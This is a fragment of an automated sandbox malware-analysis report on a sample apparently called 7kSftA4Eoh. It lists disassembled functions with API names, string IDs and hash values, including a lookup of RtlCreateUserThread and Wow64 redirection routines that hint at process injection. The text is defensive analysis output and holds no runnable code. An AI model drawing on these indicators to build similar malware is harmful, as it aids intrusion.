                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: bcda17cac5d93cdb5fe913a43640c64a51e0ba4b6faa5eba64cdacd32ab3e5c5
                                                                  • Instruction ID: a9db3b848d30421860ae17c58a2385a6443a9f5edc4f11e1185aa6785593b3b6
                                                                  • Opcode Fuzzy Hash: bcda17cac5d93cdb5fe913a43640c64a51e0ba4b6faa5eba64cdacd32ab3e5c5
                                                                  • Instruction Fuzzy Hash: 0531E12A71A65083FF3CAB2DF8803793366FB94B94F444516ED8A07266CF3CC8429790
                                                                  Function 009A795C Relevance: 7.6, APIs: 5, Instructions: 58filememoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Virtual$Free$DestroyFileHeapQueryUnmapView
                                                                  • String ID:
                                                                  • API String ID: 4268163748-0
                                                                  • Opcode ID: ecd707e202f996ff919fcabb4e169c036be23c3c50405656e62834dcfc0e3079
                                                                  • Instruction ID: 1fd430c47d9598658c97c40e3bea241410fa810d2a8eb7a32a18285d126aefd8
                                                                  • Opcode Fuzzy Hash: ecd707e202f996ff919fcabb4e169c036be23c3c50405656e62834dcfc0e3079
                                                                  • Instruction Fuzzy Hash: 07119632718A0092EE748B55FD4136EB368F786B94F588921EE4E57624DF3DCA42CB80
                                                                  Function 035657DF Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 035657F0
                                                                    • Part of subcall function 0355CE57: _getptd_noexit.LIBCMT ref: 0355CE5B
                                                                  • __doserrno.LIBCMT ref: 035657E8
                                                                    • Part of subcall function 0355CDE7: _getptd_noexit.LIBCMT ref: 0355CDEB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno_errno
                                                                  • String ID:
                                                                  • API String ID: 2964073243-0
                                                                  • Opcode ID: cd4acc95bf5b09f8f8c2be26c9f395577a48a3f2471f550acbdcdd616af2d472
                                                                  • Instruction ID: bfe1dac9a4eb7fbaa7f1939a07c93c1b106b03531c1c3dc1f547110c9f61cf25
                                                                  • Opcode Fuzzy Hash: cd4acc95bf5b09f8f8c2be26c9f395577a48a3f2471f550acbdcdd616af2d472
                                                                  • Instruction Fuzzy Hash: DFF0F4301A4A4E8EC346E764DCA035832B0FF52325FA54B55E816CF5F0E77C2441C352
                                                                  Function 009B6398 Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 009B63A9
                                                                    • Part of subcall function 009ADA10: _getptd_noexit.LIBCMT ref: 009ADA14
                                                                  • __doserrno.LIBCMT ref: 009B63A1
                                                                    • Part of subcall function 009AD9A0: _getptd_noexit.LIBCMT ref: 009AD9A4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno_errno
                                                                  • String ID:
                                                                  • API String ID: 2964073243-0
                                                                  • Opcode ID: cd4acc95bf5b09f8f8c2be26c9f395577a48a3f2471f550acbdcdd616af2d472
                                                                  • Instruction ID: 8a95e7c0eed802c01816d851685dc41982dee4beb8fe93b1bd34c439bd2cda32
                                                                  • Opcode Fuzzy Hash: cd4acc95bf5b09f8f8c2be26c9f395577a48a3f2471f550acbdcdd616af2d472
                                                                  • Instruction Fuzzy Hash: E3F0F0B270AA0489EB062F54CAC13AC36919BD1B71F954701E62F073E2C77C9442CA32
                                                                  Function 0099D580 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: %s!%s
                                                                  • API String ID: 0-2935588013
                                                                  • Opcode ID: d1dd4778a69ad9038696b18b5a84f60a207cd73a732bd85dd988b4e8d9e72639
                                                                  • Instruction ID: 40dec9cc6e277b9d3dcfdcac8c727d3a94d69403b4a4765c9988109d5dc35195
                                                                  • Opcode Fuzzy Hash: d1dd4778a69ad9038696b18b5a84f60a207cd73a732bd85dd988b4e8d9e72639
                                                                  • Instruction Fuzzy Hash: 2651ADBA202640C6DF24DFAAD0807A97365F388F98F458522EF9E47708DB3CC982C744
                                                                  Function 009AAA24 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AccountInformationLookupToken_snprintf
                                                                  • String ID: %s\%s
                                                                  • API String ID: 2107350476-4073750446
                                                                  • Opcode ID: e8f535f0c498490c4bdc1e4690b3115688fadedd2f6129859e505a1612886452
                                                                  • Instruction ID: 95abbcfa204b9525a3472d847fe564b791de894eab8f4068429a7785424c3991
                                                                  • Opcode Fuzzy Hash: e8f535f0c498490c4bdc1e4690b3115688fadedd2f6129859e505a1612886452
                                                                  • Instruction Fuzzy Hash: BE214A32204FC596EB20CF61E9547DA77A8F789B98F448526FA8D57B19DF38C209CB40
                                                                  Function 009AB800 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 009AB851
                                                                    • Part of subcall function 009ADA10: _getptd_noexit.LIBCMT ref: 009ADA14
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 009AB85C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                                  • String ID: B$x86
                                                                  • API String ID: 1812809483-1233573079
                                                                  • Opcode ID: d81cd18daed7324077352a26b73286590cea42c1c2305b4db55e814308682461
                                                                  • Instruction ID: ca52635158f3d153e2f2fa7d40b1ce808ea4c3c2f76ac0837c353bb7c7466b29
                                                                  • Opcode Fuzzy Hash: d81cd18daed7324077352a26b73286590cea42c1c2305b4db55e814308682461
                                                                  • Instruction Fuzzy Hash: 15016D72614A4486EB109F16E44039AB665F799FE4F988321EF5817BA6CF3CC244CB40
                                                                  Function 009A2B28 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: RtlCreateUserThread$ntdll.dll
                                                                  • API String ID: 1646373207-2935400652
                                                                  • Opcode ID: 3f3881e51e27e694dbcc5c375b5778905f07784a660b123b8c5191d829aaba4f
                                                                  • Instruction ID: 5d8203bab4b4e7256877e26e678d67b3dff35012b418765b020350dbae0d5b63
                                                                  • Opcode Fuzzy Hash: 3f3881e51e27e694dbcc5c375b5778905f07784a660b123b8c5191d829aaba4f
                                                                  • Instruction Fuzzy Hash: E4012D32214F8482EB20CF55F984789B7B8F799B90F998179EA9D43B14DF38C595C700
                                                                  Function 0099FF18 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: IsWow64Process$kernel32
                                                                  • API String ID: 1646373207-3789238822
                                                                  • Opcode ID: 731a3f4a3180ed4b639956c0023b506e8e51e63c1903fd8a6137ade375b55eae
                                                                  • Instruction ID: 74dd451a13c8289307f98ee2c6015f0e2ce1f95981fde1bc1c97d484ee0bb855
                                                                  • Opcode Fuzzy Hash: 731a3f4a3180ed4b639956c0023b506e8e51e63c1903fd8a6137ade375b55eae
                                                                  • Instruction Fuzzy Hash: 83E0866172170282EF05CB59F9A43A57368EB847A5F485434E91F46375EF3CC598C700
                                                                  Function 009A1388 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                                  • API String ID: 1646373207-3900151262
                                                                  • Opcode ID: 667aabc9b9536ce3034975af6a8499c6cf0a73ba4ecc93c21e81ad6850c911ed
                                                                  • Instruction ID: 2d2c7834f9caefcc817d033ca80677b80191b9521e3762187490dc3108372e17
                                                                  • Opcode Fuzzy Hash: 667aabc9b9536ce3034975af6a8499c6cf0a73ba4ecc93c21e81ad6850c911ed
                                                                  • Instruction Fuzzy Hash: 51D0C75075160581FE199B91F9583E83368AB59B61F885535C91F06372EF2CC599C340
                                                                  Function 009A1350 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                                  • API String ID: 1646373207-736604160
                                                                  • Opcode ID: fbbcf69949dc4a765985351bea2d0c18cfeb49881c2d8615ffc084255ee576bd
                                                                  • Instruction ID: e3c192f9c84eda8b18ce562e3d0ec7383db64ed2905f3bdc43c6a6f76214f68e
                                                                  • Opcode Fuzzy Hash: fbbcf69949dc4a765985351bea2d0c18cfeb49881c2d8615ffc084255ee576bd
                                                                  • Instruction Fuzzy Hash: 0BD0C75075160581FF199B91F9943E4336CEB59BA1F485535C91F06371DF2CC599C340
                                                                  Function 0355A52B Relevance: 6.3, APIs: 5, Instructions: 76COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 0355A54E
                                                                    • Part of subcall function 0355A66F: _FF_MSGBANNER.LIBCMT ref: 0355A69F
                                                                    • Part of subcall function 0355A66F: _NMSG_WRITE.LIBCMT ref: 0355A6A9
                                                                    • Part of subcall function 0355A66F: _callnewh.LIBCMT ref: 0355A6DD
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6E8
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6F3
                                                                  • malloc.LIBCMT ref: 0355A55C
                                                                    • Part of subcall function 0355A66F: _callnewh.LIBCMT ref: 0355A703
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A708
                                                                  • malloc.LIBCMT ref: 0355A57E
                                                                  • _snprintf.LIBCMT ref: 0355A599
                                                                    • Part of subcall function 0355AA23: _errno.LIBCMT ref: 0355AA5A
                                                                    • Part of subcall function 0355AA23: _invalid_parameter_noinfo.LIBCMT ref: 0355AA65
                                                                  • malloc.LIBCMT ref: 0355A5B4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
                                                                  • String ID:
                                                                  • API String ID: 2026495703-0
                                                                  • Opcode ID: 9d156e3cefeacdd739c12abb0c3551306cdb4cd07bab5fe76b50e9a5adbf6d85
                                                                  • Instruction ID: 740bbbfec39cf4916b011488b0ec0a9de5ddf598d703cbda48ea1602da6bec72
                                                                  • Opcode Fuzzy Hash: 9d156e3cefeacdd739c12abb0c3551306cdb4cd07bab5fe76b50e9a5adbf6d85
                                                                  • Instruction Fuzzy Hash: 0B112830A1CF094FD7A9EF6CA45562976E1FBCC710F54465EE48AC32A5EA38AC4187C2
                                                                  Function 0355BA13 Relevance: 6.2, APIs: 4, Instructions: 194COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno_fileno_flush_getptd_noexit_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 634798775-0
                                                                  • Opcode ID: d9a7cbc57c08e93ea4e26a3c7604e2752fe338a7cd3052b495f505ff3fc04027
                                                                  • Instruction ID: 283171f7cdafc90301dabfdee46fa5d7c71b39d1760f5362c7451cc4526ac7aa
                                                                  • Opcode Fuzzy Hash: d9a7cbc57c08e93ea4e26a3c7604e2752fe338a7cd3052b495f505ff3fc04027
                                                                  • Instruction Fuzzy Hash: D9410D30218F0D4BDB2CDA6DB46D235B6D1F799321718066FFC9AC31B5E9A0F95242C6
                                                                  Function 03540517 Relevance: 6.1, APIs: 4, Instructions: 90COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: clock
                                                                  • String ID:
                                                                  • API String ID: 3195780754-0
                                                                  • Opcode ID: c0a40aaec8f37a8735c214560a9d147e859d58f7e4e64c7536be45b4d64e88a7
                                                                  • Instruction ID: ec22468a0e2324d90df04207d61e6a93d30387af97ca6ae30ef974f1ebf300d7
                                                                  • Opcode Fuzzy Hash: c0a40aaec8f37a8735c214560a9d147e859d58f7e4e64c7536be45b4d64e88a7
                                                                  • Instruction Fuzzy Hash: 4811B4B580CB1D4F973CED9CB481276F7E4FA99260F29062ED9CA83162F950D84286D2
                                                                  Function 0356A91F Relevance: 6.1, APIs: 4, Instructions: 84stringCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0356A943
                                                                    • Part of subcall function 0355D667: _getptd.LIBCMT ref: 0355D67D
                                                                    • Part of subcall function 0355D667: __updatetlocinfo.LIBCMT ref: 0355D6B2
                                                                    • Part of subcall function 0355D667: __updatetmbcinfo.LIBCMT ref: 0355D6D9
                                                                  • _errno.LIBCMT ref: 0356A94F
                                                                    • Part of subcall function 0355CE57: _getptd_noexit.LIBCMT ref: 0355CE5B
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0356A95A
                                                                  • strchr.LIBCMT ref: 0356A970
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                                                  • String ID:
                                                                  • API String ID: 4151157258-0
                                                                  • Opcode ID: e73a64bc40bbff2a8f0215fd328a69f3920fe490f54b7fbe8d2d413a192876cd
                                                                  • Instruction ID: 39f474755e8021a248b230356a47ab99249894b6b116c357bee09ffa603ff380
                                                                  • Opcode Fuzzy Hash: e73a64bc40bbff2a8f0215fd328a69f3920fe490f54b7fbe8d2d413a192876cd
                                                                  • Instruction Fuzzy Hash: 5D2180E061CB794FC754E728A0D423676F1FB89291B2A06AEE0DBD71B5D924C442C392
                                                                  Function 0355B4D3 Relevance: 6.1, APIs: 4, Instructions: 64COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _IsNonwritableInCurrentImage.LIBCMT ref: 0355B4F0
                                                                    • Part of subcall function 0355F727: _FindPESection.LIBCMT ref: 0355F750
                                                                  • _initp_misc_cfltcvt_tab.LIBCMT ref: 0355B501
                                                                  • _initterm_e.LIBCMT ref: 0355B514
                                                                  • _IsNonwritableInCurrentImage.LIBCMT ref: 0355B55D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
                                                                  • String ID:
                                                                  • API String ID: 1991439119-0
                                                                  • Opcode ID: 2552c9ef44d90416ddedbaa5506d907db74c59832b5c0af08c42db9a1dc968fc
                                                                  • Instruction ID: 30c1ce473628ea07c2d6ef5f7610fac32fe259210dda3f5e964c1760440cf5ab
                                                                  • Opcode Fuzzy Hash: 2552c9ef44d90416ddedbaa5506d907db74c59832b5c0af08c42db9a1dc968fc
                                                                  • Instruction Fuzzy Hash: 76113031210A0ACEE719EF24FCF86AA7365F754340F58492AA802C6074FF78A985C685
                                                                  Function 009910D0 Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: clock
                                                                  • String ID:
                                                                  • API String ID: 3195780754-0
                                                                  • Opcode ID: c0a40aaec8f37a8735c214560a9d147e859d58f7e4e64c7536be45b4d64e88a7
                                                                  • Instruction ID: 7ff71f263b9e685ee5d004602cc4719b26016d26ca3cb5db3dca6380744b9d14
                                                                  • Opcode Fuzzy Hash: c0a40aaec8f37a8735c214560a9d147e859d58f7e4e64c7536be45b4d64e88a7
                                                                  • Instruction Fuzzy Hash: 50116B3260875665AB35EEBA6980177F654F7843E4F190521EF9443705EA74C8C2C701
                                                                  Function 009BB4D8 Relevance: 6.1, APIs: 4, Instructions: 62stringCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009BB4FC
                                                                    • Part of subcall function 009AE220: _getptd.LIBCMT ref: 009AE236
                                                                    • Part of subcall function 009AE220: __updatetlocinfo.LIBCMT ref: 009AE26B
                                                                    • Part of subcall function 009AE220: __updatetmbcinfo.LIBCMT ref: 009AE292
                                                                  • _errno.LIBCMT ref: 009BB508
                                                                    • Part of subcall function 009ADA10: _getptd_noexit.LIBCMT ref: 009ADA14
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 009BB513
                                                                  • strchr.LIBCMT ref: 009BB529
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                                                  • String ID:
                                                                  • API String ID: 4151157258-0
                                                                  • Opcode ID: e73a64bc40bbff2a8f0215fd328a69f3920fe490f54b7fbe8d2d413a192876cd
                                                                  • Instruction ID: e0fbab162461d41c9e6a9cda06e0f3bb2e4d55264b71c95b64184d4ac6fdfa08
                                                                  • Opcode Fuzzy Hash: e73a64bc40bbff2a8f0215fd328a69f3920fe490f54b7fbe8d2d413a192876cd
                                                                  • Instruction Fuzzy Hash: DA1126636082A081CB319616A2502BEB794E380BF4B5C4521FA970BBD5CBECC841C752
                                                                  Function 009AA324 Relevance: 6.0, APIs: 4, Instructions: 41threadsleepCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
